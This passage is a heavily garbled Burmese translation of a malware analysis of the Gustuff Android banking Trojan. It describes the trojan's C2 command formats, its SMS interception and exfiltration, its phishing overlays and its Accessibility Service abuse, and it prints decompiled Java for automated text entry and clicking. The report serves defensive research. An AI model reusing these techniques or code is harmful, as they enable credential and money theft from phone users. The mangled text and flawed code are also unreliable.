áá¯ááºáá±áᬠ| á¡ááá¯áá«á¡áááá·áºááẠáá¯á¶ážá áœá²áá°áá±áá¬ááᯠáá»ááºááẠáááºááœááºáááºá á¡ááá®áá±ážááŸááºážááᯠá áááºá¡áá¯á¶ážááŒá¯áá²á·ááá·áº áááºááá·áºá¡áááºáá±á«áºáá°áááºá á ááºáá á¹á ááºážááŒááºáááºá áááºááŒááºáž (áááºáá¡áá¯á¶ážááŒá¯áá°) ááŒáá·áº áá±áá¬ááᯠáá¯á¶ážáá¯á¶ážáá»ááºáá áºááẠááá¯á·ááá¯áẠá¡áá¯á¶ážááŒá¯áá°áá±áá¬ááá¯áᬠáá»ááºááá¯ááºááẠ(ááá·áºááœá¬ážá¡áá¯á¶ážááŒá¯áá°)á |
ááŒá±á¡áááºá ááẠ| Proxy module ááá¯ááœáá·áºáá«á module ááá¯ááºáá±á¬ááºáá»ááºááᯠáá®ážááŒá¬ážááá¹ááá áºáá¯ááœáẠáá±á¬áºááŒáá¬ážáá«áááºá |
ááŒá±á¡áááºáááºáá«á | Proxy module ááᯠáááºáá«á |
openLink | ááá·áºááºááᯠááá¯ááºáá¬áá«á ááá·áºááºááẠâurlâ áá±á¬á·á¡á±á¬ááºááŸá JSON áá±á¬ááºá¡ááœááºážááœáẠáááºááŸááááºá ááá·áºááºááá¯ááœáá·áºááẠâandroid.intent.action.VIEWâ ááᯠá¡áá¯á¶ážááŒá¯áááºá |
uploadAllSms | á ááºááŸáááŸááá±á¬ SMS á á¬ááá¯á¡á¬ážáá¯á¶ážááᯠáá¬áá¬ááá¯á· ááá¯á·áá«á |
áá«ááºáá¯á¶á¡á¬ážáá¯á¶ážááᯠá¡ááºáá¯ááºáá¯ááºáá«á | áá±á¬áá«ááá¯ážááŸááá±á¬ á ááºá០áá¯á¶áá»á¬ážááᯠURL áá áºáá¯ááá¯á· ááá¯á·áá«á URL ááẠááá·áºáááºáá»ááºáá áºáá¯á¡ááŒá Ạáá¬áá«áááºá |
uploadFile | áá°ážá ááºáá¶áá¬ážááá±á¬ á ááºá០URL áá áºáá¯ááá¯á· ááá¯ááºáá áºáᯠááá¯á·áá«á URL ááẠááá·áºáááºáá»ááºáá áºáá¯á¡ááŒá Ạáá¬áá«áááºá |
áá¯ááºážáá¶áá«ááºáá»á¬áž á¡ááºáá¯ááºáá¯ááºáá«á | ááá·áºá¡áááºá¡ááœááºá á¬áááºážá០áá¯ááºážáá¶áá«ááºáá»á¬ážááᯠáá¬áá¬ááá¯á· áá±ážááá¯á·áá«á áá±á¬á· âabâ áá«ááá·áº JSON á¡áá¬ááá¹áá¯áááºááá¯ážááᯠáá«áá¬áá®áá¬á¡ááŒá Ạáááºáá¶áááŸááá«á á¡ááá®áá±ážááŸááºážááẠáá¯ááºážá á¬á¡á¯ááºá០á¡áááºá¡ááœááºá á¬áááºážááᯠáááºáá¶áááŸááááºááŒá áºáááºá áá±á¬á· "sms" áá«ááá·áº JSON á¡áá¬á¡á¬áž ááá·áºáááºáá»ááºáá áºáá¯á¡ááŒá Ạáááºáá¶áááŸááá«áá á¡ááá®áá±ážááŸááºážááẠSMS á á¬ááá¯áá±ážááá¯á·áá°áá»á¬ážáá¶á០á¡áááºá¡ááœááºá á¬áááºážááᯠáááºáááºá |
ááŒá±á¬ááºážáá²ááŒááºážááŸááºáááºáž | á¡ááá®áá±ážááŸááºážááẠâurlâ áá±á¬á·ááᯠá¡áá¯á¶ážááŒá¯á ááá·áºáááºáá±á¬ááºáá áºáá¯á¡ááŒá Ạáá±á¬ááºááŸááá¬ááá·áº ááááºá á¬á០ááá¯ááºááᯠáá±á«ááºážáá¯ááºáá¯ááºáááºá áá±á«ááºážáá¯ááºáá¯ááºáá¬ážáá±á¬ááá¯ááºááᯠâarchive.zipâ á¡áááºááŒáá·áº ááááºážáááºážáá¬ážáááºá ááá¯á·áá±á¬áẠá¡ááá®áá±ážááŸááºážááẠááá¯ááºááᯠáá áºááœáá·áºááŒá®áž archive password âb5jXh37gxgHBrZhQ4j3Dâ ááᯠá¡áá¯á¶ážááŒá¯á ááœá±ážáá»ááºááá¯ááºáááºááŒá áºáááºá áá áºááœáá·áºáá¬ážááá·áºááá¯ááºáá»á¬ážááᯠ[ááŒááºáááá¯ááŸá±á¬ááºááŸá¯]/hgps áááºážááœáŸááºááœáẠááááºážáááºážáá¬ážáááºá á€áááºážááœáŸááºááœááºá á¡ááá®áá±ážááŸááºážááẠáááºá¡áá¯áá»á¬ážááᯠááááºážáááºážááẠ(á¡á±á¬ááºááœááºáá±á¬áºááŒáá¬ážáááº)á |
á áá±á¬á·ááŸááºáᬠ| á¡ááá¯áá«á¡áááá·áºááᯠáá®ážááŒá¬ážááá¹ááá áºáá¯ááœáẠáá±á¬áºááŒáá¬ážááá·áº Action Service ááŒáá·áº áá¯ááºáá±á¬ááºááẠáá®ááá¯ááºážáá¯ááºáá¬ážáááºá |
á ááºážááẠ| áá¬ááŸááá¯ááºáá°ážá |
download, | á¡ááá¯áá«á¡áááá·áºááŸá¬ á¡áá±ážááááºážáá¬áá¬áá áºáá¯á០ááá¯ááºáá áºáá¯ááᯠáá±á«ááºážáá¯ááºáá¯ááºááŒá®áž âáá±á«ááºážáá¯ááºáá»á¬ážâ áááºážááœáŸááºááœáẠááááºážáááºážááẠáááºááœááºáá«áááºá URL ááŸáá·áº ááá¯ááºá¡áááºááẠááá·áºáááºáá»ááºáá áºáá¯á¡áá±ááŒáá·áº áá¬áááºá JSON ááá·áºáááºáá±á¬ááºááá¹áá¯ááœáẠá¡ááœááºáá»á¬áž á¡áá®ážáá®ážááŸááááº- "url" ááŸáá·áº "fileName"á |
ááá¯áááºááŸá¬áž | "áá±á«ááºážáá¯ááºáá»á¬áž" áááºážááœáŸááºá០ááá¯ááºáá áºáá¯ááᯠáááºááŸá¬ážáááºá ááá¯ááºá¡áááºááẠ"ááá¯ááºá¡áááº" áá±á¬á·ááŒáá·áº JSON áá±á¬ááºáá áºáá¯ááŒáá·áº áá¬áá«áááºá á á¶ááá¯ááºá¡áááºááŸá¬ âtmp.apkâ ááŒá áºáááºá |
ááááá±ážáá»áẠ| á á®áá¶ááá·áºááœá²ááŸá¯áá¬áá¬á០áááºááŸááºáá¬ážáá±á¬ áá±á¬áºááŒáá»ááºááŸáá·áº áá±á«ááºážá ááºá á¬áá¬ážáá»á¬ážáá«ááŸááá±á¬ á¡ááŒá±á¬ááºážááŒá¬ážáá»ááºááᯠááŒááá«á |
Command Format ááááá±ážáá»ááº:
{
"results" : "OK",
"command":{
"id": <%id%>,
"command":"notification",
"timestamp":<%Server Timestamp%>,
"params":{
"openApp":<%Open original app or not%>,
"array":[
{"title":<%Title text%>,
"desc":<%Description text%>,
"app":<%Application name%>}
]
},
},
}
á á¯á¶á ááºážá á áºáá±ážááŸá¯á¡á±á¬ááºááœáẠááá¯ááºááŸáá¯ááºáá±ážáá±á¬ á¡ááŒá±á¬ááºážááŒá¬ážáá»ááºááẠá¡ááœááºááœáẠáááºááŸááºáá¬ážááá·áº á¡ááá®áá±ážááŸááºážááŸáá¯ááºáá±ážáá±á¬ á¡áááá±ážáá»ááºáá»á¬ážááŸáá·áº áá°áá®áá«áááºá app ááá¯. áááºááá¯ážááŸáááẠopenApp â ááŸááºáá«áááºá á¡ááŒá±á¬ááºážááŒá¬ážáá»ááºáá áºáá¯ááœáá·áºáá±á¬á¡áá«á á¡ááœááºááœáẠáááºááŸááºáá¬ážááá·áº á¡ááºááºááᯠá áááºááá¯ááºáá«áááºá app ááá¯. áááºááá¯ážááŸáááẠopenApp - ááŸá¬ážáááºááá¯áá»áŸááº-
- ááŒá¬ážáá±á¬ááºážááŒááºážáááºážááá¯ážáá áºáᯠááœáá·áºáá¬ááŒá®ážá áááºážááœáŸááºá០áá±á«ááºážáá¯ááºáá¯ááºáá¬ážááá·áº á¡ááŒá±á¬ááºážá¡áá¬áá»á¬áž <%external storage%>/hgps/<%filename%>
- áá¬áá¬á០áá±á«ááºážáá¯ááºáá¯ááºáá¬ážáá±á¬ á¡ááŒá±á¬ááºážá¡áá¬áá»á¬ážááᯠphishing window áá áºáá¯ááœáá·áºáááºá <%url%>?id=<%Bot id%>&app=<%Application name%>
- áááºá¡áá±ážá áááºá¡áá»ááºá¡áááºáá»á¬ážááᯠááá·áºááœááºážáááºá¡ááœáá·áºá¡áá±ážááŸáá·áºá¡áá° Google Play Card á¡ááœááºáá±á¬ááºááá·áº ááŒá¬ážáá±á¬ááºážááá·áºáááºážááá¯ážáá áºáᯠááœáá·áºáááºá
á¡ááá®áá±ážááŸááºážááẠáááºááá·áº command áááááºááá¯áááᯠáá±ážááá¯á·áááºá <%CnC%>set_state.php á¡á±á¬ááºáá«áá±á¬áºáááºááœáẠJSON á¡áá¬ááá¹áá¯áá áºáá¯á¡áá±ááŒáá·áº
{
"command":
{
"command":<%command%>,
"id":<%command_id%>,
"state":<%command_state%>
}
"id":<%bot_id%>
}
áá¯ááºáá±á¬ááºáá»ááºáá»á¬ážáááºáá±á¬ááºááŸá¯
á¡ááá®áá±ážááŸááºáž áá¯ááºáááºážá
ááºáá»á¬ážááœáẠáá«áááºááá·áº á¡áááá·áºáá»á¬ážá
á¬áááºáž ááŸá¯ááºááŸá¬ážááŸá¯. ááœááºáááºážáá
áºáá¯ááᯠáááºáá¶áááŸááá±á¬á¡áá«á ááá¯ážáá»á²á·áá¬ážáá±á¬ á¡áááá·áºááᯠáá¯ááºáá±á¬ááºááẠá¡áááá·áºáá±ážááá·áº áá¯ááºáá±á¬ááºááŸá¯ áá±á¬áºáá»á°ážááẠá€áááºáá±á¬ááºááŸá¯ááᯠáááºáá±á¬ááºáááºá áááºáá±á¬ááºááŸá¯ááẠJSON á¡áá¬ááá¹áá¯ááᯠááá·áºáááºáá»ááºáá
áºáá¯á¡ááŒá
Ạáááºáá¶áááºá áááºáá±á¬ááºááŸá¯ááẠá¡á±á¬ááºáá« command áá»á¬ážááᯠáá¯ááºáá±á¬ááºááá¯ááºáááº-
1. PARAMS_ACTION â ááá¯ááá¯á·áá±á¬á¡áááá·áºááá¯áááºáá¶áááŸááá±á¬á¡áá«á áááºáá±á¬ááºááŸá¯ááẠá¡á±á¬ááºáá«á¡ááá¯ááºážááŒá áºááá¯ááºááá·áº Type key ááááºááá¯áž JSON áá±á¬ááºá០ááááá¯á¶ážáááºáá¶áááŸááááº-
- áááºáá±á¬ááºááŸá¯á¡áá»ááºá¡ááẠ- subcommand ááẠJSON parameter á០áá±á¬á·ááŒáá·áº áááºááá¯ážááᯠááá°áááºá á¡áá±ážáááŒá®ážáá«á. á¡áá¶ááŸááºáá»áŸáẠá¡ááá®áá±ážááŸááºážááẠá¡áá¶ááᯠáááºááŸááºáááºá FLAG_ISOLATED_PROCESS Accessibility Service ááᯠá¡áá¯á¶ážááŒá¯á áááºáá±á¬ááºááŸá¯áá áºáá¯ááá¯á· á€áááºážááŒáá·áº áááºáá±á¬ááºááŸá¯ááᯠáá®ážááŒá¬ážáá¯ááºáááºážá ááºáá áºáá¯á¡ááŒá Ạá áááºáá±á¬ááºááœááºáá«áááºá
- á¡ááŒá Ạâ áááºááŸáá¡á¬áá¯á¶á áá¯ááºáá±áá±á¬ áááºážááá¯ážááŸáá·áºáááºáááºááá·áº áá¬áá¬á¡áá»ááºá¡áááºáá»á¬ážááᯠáááºáá¶ááá°ááŒá®áž áá±ážááá¯á·áá«á á¡ááá®áá±ážááŸááºážááẠAccessibilityNodeInfo á¡áááºážá¡á á¬ážááᯠá¡áá¯á¶ážááŒá¯á á¡áá»ááºá¡áááºááá°áááºá
- admin áá²á· - á á®áá¶ááá·áºááœá²áá°á¡ááœáá·áºá¡áá±ážááᯠáá±á¬ááºážááá¯áá«á
- ááŸá±á¬áá»á·ááŸá±áž â âáá±áá¬â áá±á¬á·á¡ááœáẠáá«áá¬áá®áá¬ááœáẠáááºááŸááºáá¬ážááá·áº áá®áá®á áá¹ááá·áº á¡áá±á¡ááœááºá¡ááœáẠActionsService ááᯠááá¯ááºážáá¶á·áá«á
- ááŒáááºážáá±á«áẠâ á¡áá¯á¶ážááŒá¯áá°ááŒááºááá¯ááºáá±á¬ windows á á¬áááºážááᯠáá±ážááá¯á·áá«á
- install â áá±á¬áá«ááá¯ážáá°ážá ááºáá¶áá¬ážááá±á¬áááááá¬áá±á«áºááœáẠá¡ááºááºáá®áá±ážááŸááºážááᯠááá·áºááœááºážáá«á archive package áá¡áááºááẠâfileNameâ key ááœááºááŒá áºáááºá áá±á¬áºááœááºážááá¯ááºááá¯ááºááá¯ááºá áá±á«ááºážáá¯ááºáá»á¬ážáááºážááœáŸááºááœáẠáááºááŸááááºá
- ááá¹áá¬áá¯á¶ážááá¯ááºáᬠ- subcommand ááẠáááºááŸá window á០ááœá¬ážáá¬ááẠáááºááœááºáá«áááºá
- Quick Settings áá®áá°ážááœááº
- ááœááºáá²á·áá²á·
- á¡áááº
- á¡áááá±ážáá»ááºáá»á¬ážáá®ááá¯á·
- áááŒá¬áá±ážáá®á ááœáá·áºáá¬ážáá±á¬ á¡ááá®áá±ážááŸááºážáááºážááá¯ážááá¯á·
- áá áºááœáŸáẠ- áá»áŸá±á¬ááºááœáŸá¬ááá¯ááœáá·áºáá«á á¡ááá®áá±ážááŸááºážá¡áááºááẠáá±á¬á·ááŒáá·áº áá±á¬ááºáá áºáá¯á¡ááŒá Ạáá¬áááºá áá±áá¬.
- á¡áᶠ- á¡áá¶áá¯ááºááᯠá¡áá¶ááááºá¡ááŒá áºááŒá±á¬ááºážáá«á
- áá±á¬á·ááœáá·áº â áááºáá¬ážááŒááºááŸáá·áº áá®ážáá¯ááºá áá±á¬ááºáá¶á¡áááºážááᯠá¡áááºážá¡ááŒáá·áºááŒáá·áº ááœáá·áºáá±ážáááºá á¡ááá®áá±ážááŸááºážááẠWakeLock ááá¯á¡áá¯á¶ážááŒá¯á string [Application lable]: INFO ááᯠáááºá¡ááŒá ẠáááºááŸááºáá±ážáááº
- ááœáá·áºááŒá¯áá»ááºáááºááá·áºááŒááºážá â áá¯ááºáá±á¬ááºáá»ááºááᯠá¡áá±á¬ááºá¡áááºááá±á¬áºáá« (á¡áááá·áºáá±ážááá·áºáá¯ááºáá±á¬ááºáá»ááºá¡ááœáẠáá¯á¶á·ááŒááºááŸá¯ááẠ{"message":"ááá¶á·ááá¯ážáá«"} ááá¯á·ááá¯áẠ{"message":"low sdk"})
- áááºá¡áá°á¡áᬠâ áá¯ááºáá±á¬ááºáá»ááºááᯠá¡áá±á¬ááºá¡áááºááá±á¬áºáá« (á¡áááá·áºááᯠá¡áá±á¬ááºá¡áááºáá±á¬áºááẠáá¯á¶á·ááŒááºááŸá¯ááẠ{"áááºáá±á·áá»áº":"ááá¶á·ááá¯ážáá«"} ááá¯á·ááá¯áẠ{"áááºáá±á·ááºá»":"Low API"})
- ááœááºá·ááŒá¯áá»áẠ- á¡ááá®áá±ážááŸááºážá¡ááœáẠááœáá·áºááŒá¯áá»ááºáá±á¬ááºážáá¶ááẠá€á¡áááá·áºááẠááá¯á¡ááºáááºá ááá¯á·áá±á¬áºá query function ááᯠá¡áá±á¬ááºá¡áááºááá±á¬áºáá±á¬ááŒá±á¬áá·áº command ááẠá¡áááá¹áá«ááºáááŸááá±á áá±á¬ááºážááá¯áá¬ážáá±á¬á¡ááœáá·áºá¡áá±ážáá»á¬ážá
á¬áááºážááẠ"ááœáá·áºááŒá¯áá»ááºáá»á¬áž" áá±á¬á·áá«áá±á¬ JSON á¡áááºážá¡áá»ááºážáá
áºáá¯á¡áá±ááŒáá·áº áá¬áá«áááºá á
á¶á
á¬áááºáž-
- android.permission.READ_PHONE_STATE
- android.permission.READ_CONTACTS
- android.permission.CALL_PHONE
- android.permission.RECEIVE_SMS
- android.permission.SEND_SMS
- android.permission.READ_SMS
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- ááœáá·áºááŸá
Ạâ phishing window ááá¯ááŒááá«á áá¬áá¬ááŸáá¬áá±á¬ áá«áá¬áá®áá¬áá±á«áºáá°áááºá á¡ááá®áá±ážááŸááºážááẠá¡á±á¬ááºáá« phishing windows ááá¯ááŒáááá¯ááºáááº-
- áááºážááœáŸááºáá áºáá¯ááŸá ááá¯ááºáá áºáá¯ááœáẠá¡ááŒá±á¬ááºážá¡áá¬áá»á¬ážááᯠáá±ážáá¬ážááá·áº ááŒá¬ážáá±á¬ááºážáááºážááá¯ážáá áºáá¯ááᯠááŒáá«á <%external directory%>/hgps/<%param_filename%>. áááºážááá¯ážááŸáá·áº á¡áá¯á¶ážááŒá¯áá° á¡ááŒááºá¡ááŸááºáá¯á¶á·ááŒááºááŸá¯á ááááºá¡á¬áž áá±ážááá¯á·áá«áááºá <%CnC%>/records.php
- á¡ááŒá±á¬ááºážá¡áá¬áá»á¬ážááᯠááááºá á¬ááŸááŒáá¯áááºáááºáá¬ážááá·áº ááŒá¬ážáá±á¬ááºážáááºážááá¯ážáá áºáá¯ááᯠááŒáá«á <%url_param%>?id=<%bot_id%>&app=<%packagename%>. áááºážááá¯ážááŸáá·áº á¡áá¯á¶ážááŒá¯áá° á¡ááŒááºá¡ááŸááºáá¯á¶á·ááŒááºááŸá¯á ááááºá¡á¬áž áá±ážááá¯á·áá«áááºá <%CnC%>/records.php
- Google Play áááºá¡ááŒá Ạá¡ááœááºáá°áá¬ážáá±á¬ ááŒá¬ážáá±á¬ááºážááá·áº áááºážááá¯ážááᯠááŒáá«á
- á¡ááŒááºá¡ááŸááºáá¯áá·áºááŒááºáá±á¬ â AcessibilityService ááᯠá¡áá¯á¶ážááŒá¯á á¡ááŒá¬ážáá±á¬ á¡ááá®áá±ážááŸááºážáá»á¬ážá áááºážááá¯ážááŒááºá
ááºáá»á¬ážááŸáá·áº á¡ááŒááºá¡ááŸáẠáá¯á¶á·ááŒááºááẠá¡áááá·áºááᯠáá®ááá¯ááºážáá¯ááºáá¬ážáááºá á¡ááŒááºá¡ááŸááºá¡áá»áá¯ážááŒá¯áááºá¡ááœáẠá¡á
á®á¡á
ááºááœáẠá¡áá°ážáááºáá±á¬ááºááŸá¯áá
áºáá¯ááᯠá¡áá±á¬ááºá¡áááºáá±á¬áºáá²á·áááºá á
á¯á¶á
ááºážá
á
áºáá±ážááŸá¯á¡á±á¬ááºááœááºááŸááá±á¬ á¡ááá®áá±ážááŸááºážááẠwindows ááŸáá·áº á¡ááŒááºá¡ááŸááºá¡áá»áá¯ážáááºáá±á¬ááºááá¯ááºáááº-
- áááºááŸá ááŸá¯ááºááŸá¬ážáá±áá«áááºá á€ááá á¹á ááœááºá ááá·áºáááºáá»ááºááœáẠááẠá¡ááŒááºá¡ááŸááºáá¯á¶á·ááŒááºááẠááá¯á¡ááºááá·áº á¡áá¬ááá¹áá¯á id ááá¯á·ááá¯áẠá á¬áá¬áž (á¡áááº) áá«ááŸááááºá
- á¡áááá·áºááᯠáá¯ááºáá±á¬ááºááá·áºá¡áá»áááºááœáẠá¡áá¯á¶ážááŒá¯áá°á០ááŒááºááá¯ááºáááºá á¡ááá®áá±ážááŸááºážááẠwindows ááᯠID ááŒáá·áºááœá±ážáá»ááºáááºá
áá á¹á ááºážáááºáá¶áááŸáááŒááºážá AccessibilityNodeInfo á áááºáá«áááºá á¬ážáá±á¬ áááºážááá¯ážááŒááºá ááºáá»á¬ážá¡ááœááºá ááá·áºáááºáá»ááºáá»á¬ážáá±á«áºáá°áááºá á¡ááá®áá±ážááŸááºážááẠá¡á±á¬ááºáá«áá¯ááºáá±á¬ááºáá»ááºáá»á¬ážááᯠáá¯ááºáá±á¬ááºááá¯ááºáááº-
- focus â á¡áá¬ááá¹áá¯ááᯠá¡á¬áá¯á¶á áá¯ááºáá«á
- ááá Ạâ á¡áá¬ááá¹áá¯áá áºáá¯ááᯠááŸáááºáá«á
- actionId â ID ááŒáá·áº áá¯ááºáá±á¬ááºáá»ááºáá áºáá¯ááᯠáá¯ááºáá±á¬ááºáá«á
- setText â á¡áá¬ááá¹áá¯áá áºáá¯á á á¬áá¬ážááᯠááŒá±á¬ááºážáá²áá«á á á¬áá¬ážááᯠááŒá±á¬ááºážáá²ááẠáááºážáááºážááŸá áºáá»áá¯ážááŒáá·áº ááŒá áºááá¯ááºáááº- áá¯ááºáá±á¬ááºáá»ááºáá áºáᯠáá¯ááºáá±á¬ááºáá«á ACTION_SET_TEXT (áá°ážá ááºáá¬ážáá±á¬á ááºáá á¹á ááºážá Android áá¬ážááŸááºážááẠáááºáá«á ááá¯á·ááá¯áẠáá°áá®áá«á Lollipop) ááá¯á·ááá¯áẠááá áºáá¯ááºáá±á«áºááœáẠá á¬ááŒá±á¬ááºážáá áºááŒá±á¬ááºážáááºáᬠá¡áá¬ááá¹áá¯áá áºáá¯áá²ááá¯á· áá°ážááá·áºááŒááºážááŒáá·áº (áá¬ážááŸááºážá¡áá±á¬ááºážáá»á¬ážá¡ááœááº)á áááºáá¯ááºáááºážá¡ááá®áá±ážááŸááºážáá áºáá¯ááœááºáá±áá¬ááá¯ááŒá±á¬ááºážáá²ááẠá€á¡áááá·áºááá¯áá¯á¶ážááá¯ááºáááºá
2. PARAMS_ACTIONS - áá°áá®ááẠPARAMS_ACTIONJSON á¡áááºážá¡áá»ááºážáá áºáá¯áᬠáá±á¬ááºááŸááá¬áááºá
á¡ááŒá¬ážá¡ááá®áá±ážááŸááºážáá áºáá¯á áááºážááá¯ážááŒááºá ááºáá»á¬ážááŸáá·áº á¡ááŒááºá¡ááŸááºáá¯á¶á·ááŒááºááá·áºáá¯ááºáá±á¬ááºáá»ááºááᯠáá°á¡áá»á¬ážá á áááºáááºá á¬ážááŒáá¯á¶ááááºá Gustuff ááœáẠá€áá¯ááºáá±á¬ááºáá»ááºááᯠá¡áá±á¬ááºá¡áááºáá±á¬áºáá¯á¶ááŸá¬-
boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
int count = action.optInt("repeat", 1);
Iterator aiListIterator = ((Iterable)aiList).iterator();
int count = 0;
while(aiListIterator.hasNext()) {
Object ani = aiListIterator.next();
if(1 <= count) {
int index;
for(index = 1; true; ++index) {
if(action.has("focus")) {
if(((AccessibilityNodeInfo)ani).performAction(1)) {
++count;
}
}
else if(action.has("click")) {
if(((AccessibilityNodeInfo)ani).performAction(16)) {
++count;
}
}
else if(action.has("actionId")) {
if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
++count;
}
}
else if(action.has("setText")) {
customHeader ch = CustomAccessibilityService.a;
Context context = this.getApplicationContext();
String text = action.optString("setText");
if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
++count;
}
}
if(index == count) {
break;
}
}
}
((AccessibilityNodeInfo)ani).recycle();
}
res.addPropertyNumber("res", Integer.valueOf(count));
}
á á¬áá¬ážá¡á á¬ážááá¯ážáá¯ááºáá±á¬ááºáá»ááº
boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
boolean result;
if(Build$VERSION.SDK_INT >= 21) {
Bundle b = new Bundle();
b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
result = ani.performAction(0x200000, b); // ACTION_SET_TEXT
}
else {
Object clipboard = context.getSystemService("clipboard");
if(clipboard != null) {
((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
result = ani.performAction(0x8000); // ACTION_PASTE
}
else {
result = false;
}
}
return result;
}
ááá¯á·ááŒá±á¬áá·áºá ááááºážáá»á¯ááºáá¬áá¬á ááŸááºáááºáá±á¬ááœá²á·á ááºážáá¯á¶ááŒáá·áºá Gustuff ááẠáááºáá¯ááºáááºážá¡ááºááá®áá±ážááŸááºážááœáẠá á¬áá¬ážá¡ááœááºáá»á¬ážááᯠááŒáá·áºá áœááºááŒá®áž ááœá±áá±ážááœá±áá° á¡ááŒá®ážáááºááẠááá¯á¡ááºáá±á¬ááá¯ááºáá»á¬ážááᯠááŸáááºááá¯ááºáááºá Trojan ááẠá¡ááá®áá±ážááŸááºážááá¯á· áá±á¬á·ááºá¡ááºáááºáááºáááºáááá¯á¡ááºáá±âáááºážááẠááœááºážá¡á¬ážáá±ážááááá±ážáá»ááºáá áºáá¯ááŒáááẠá¡áááá·áºáá±ážááŒá®ážáá±á¬áẠááááºááá·áºááœááºážáá¬ážááá·áº áááºáá¯ááºáááºážá¡ááºááºááá¯ááœáá·áºááẠáá¯á¶áá±á¬ááºáá«áááºá á¡áá¯á¶ážááŒá¯áá°ááẠáá°á·ááá¯ááºáá° á á áºááŸááºááŒá±á¬ááºáž áááºáá±ááŒáááºááŒá áºááŒá®ážá ááá¯á·áá±á¬áẠGustuff ááẠáá¬ážááá¯ááŒáá·áºááá¯ááºáááºááŒá áºáááºá
SMS áááºáá±á·áá»áº áá¯ááºáá±á¬ááºááŒááºáž module
á¡ááá®áá±ážááŸááºážááẠSMS áááºáá±á·áá»áºáá»á¬ážááᯠáááºáá¶ááẠáá°ážá ááºáá¶áá¬ážááá±á¬ á ááºá¡ááœáẠááŒá áºáááºááá¯ááºááœááºáááááá¬ááᯠááá·áºááœááºážáá±ážáááºá áá±á·áá¬ááŸá¯á¡á±á¬ááºááŸá á¡ááá®áá±ážááŸááºážááẠSMS áááºáá±á·áá»áºáááá¯ááºáááºááœááºáá«ááŸáááá·áº á¡á±á¬áºááá±áá¬áá¶á០ááœáŸááºááŒá¬ážáá»ááºáá»á¬ážááᯠáááºáá¶áááŸáááá¯ááºáá«áááºá Command áá»á¬ážááẠformat ááŒáá·áºáá¬áá«áááºá
7!5=<%Base64 áá¯ááºáá¯ááºáá¬ážáá±á¬ á¡áááá·áº%>
á¡ááá®áá±ážááŸááºážááẠáááºáá¬áá±á¬ SMS áááºáá±á·áá»áºáá»á¬ážá¡á¬ážáá¯á¶ážááœáẠá á¬ááŒá±á¬ááºážááᯠááŸá¬ááœá±áááºá 7!5=string áá áºáá¯ááᯠááŸá¬ááœá±á·áá±á¬á¡áá«á áááºážááẠBase64 á០string ááᯠoffset 4 ááœáẠáá¯ááºáá¯ááºááŒá®áž command ááᯠáá¯ááºáá±á¬ááºáááºá command áá»á¬ážááẠCnC ááŸáá·áºáááºáá°áááºá áá¯ááºáá±á¬ááºáá»ááºááááºááᯠá¡áááá·áºáá±ážáá±á¬ áá¶áá«ááºáá áºáá¯áááºážááá¯á· áá±ážááá¯á·áááºá áá¯á¶á·ááŒááºááŸá¯áá¯á¶á á¶-
7*5=< âresult_code commandâ%> á %Base64 áá¯ááº
ááœá±ážáá»ááºááá¯ááºáá±á¬á¡á¬ážááŒáá·áºá á¡ááá®áá±ážááŸááºážááẠáááºáá¶áááŸááá¬ážáá±á¬ á á¬ááá¯á¡á¬ážáá¯á¶ážááᯠRoot áá¶áá«ááºááá¯á· áá±ážááá¯á·ááá¯ááºáááºá ááá¯ááá¯á·áá¯ááºáá±á¬ááºáááºá áŠážá á¬ážáá±ážááá¯ááºááœáẠRoot áá¶áá«ááºááᯠáááºááŸááºááááºááŒá áºááŒá®áž áááºáá±á·áá»áºááŒááºááœáŸááºážááŒááºážá¡áá¶ááᯠáááºááŸááºááá«áááºá áá±á¬áºáááºááŒáá·áº ááá¯ááºááá¯ááºáá°ááá¶áá«ááºáá¶ááá¯á· SMS á á¬ááá¯áá áºá á±á¬áẠáá±ážááá¯á·áááº-
<%from number%> - <%Timeá áá±á¬áºáááº- dd/MM/yyyy HH:mm:ss%> <%SMS body%>
ááá¯á·á¡ááŒááºá ááœá±ážáá»ááºááá¯ááºáááºá á¡ááá®áá±ážááŸááºážááẠCnC ááá¯á· á á¬ááá¯áá±ážááá¯á·ááá¯ááºáááºá SMS á á¬ááá¯ááᯠJSON áá±á¬áºáááºááŒáá·áº áá¬áá¬ááá¯á· ááá¯á·áááº-
{
"id":<%BotID%>,
"sms":
{
"text":<%SMS body%>,
"number":<%From number%>,
"date":<%Timestamp%>
}
}
á¡áá¶ááᯠááŒáŸá±á¬ááºáá¬ážááẠnameGenerator("DEFAULT_APP_SMS") - á¡ááá®áá±ážááŸááºážááẠSMS áááºáá±á·ááºá»ááá¯áá¯ááºáá±á¬ááºááŒááºážááá¯áááºááá·áºááŒá®ážá¡áááºáááºáá±á·ááºá»áá»á¬ážá á¬áááºážááá¯ááŸááºážáááºážáááºá
ááá±á¬ááºá á® áá±á¬áºáá»á°áž
áá±á·áá¬ááŸá¯á¡á±á¬ááºááŸá á¡ááá®áá±ážááŸááºážááœáẠBackconnect Proxy module áá áºáá¯áá«ááŸáááẠ(áá±á¬ááºááœáẠProxy module á¡ááŒá áºáááºááœáŸááºážáááº) áá«áááºááẠááœá²á·á ááºážááŸá¯áá±áá¬ááᯠááŸááºážáááºážáá±á¬áá¯á¶á á¶ááŒáá·áº ááá°áá¬ááœáẠááááºážáááºážáá¬ážáááº-
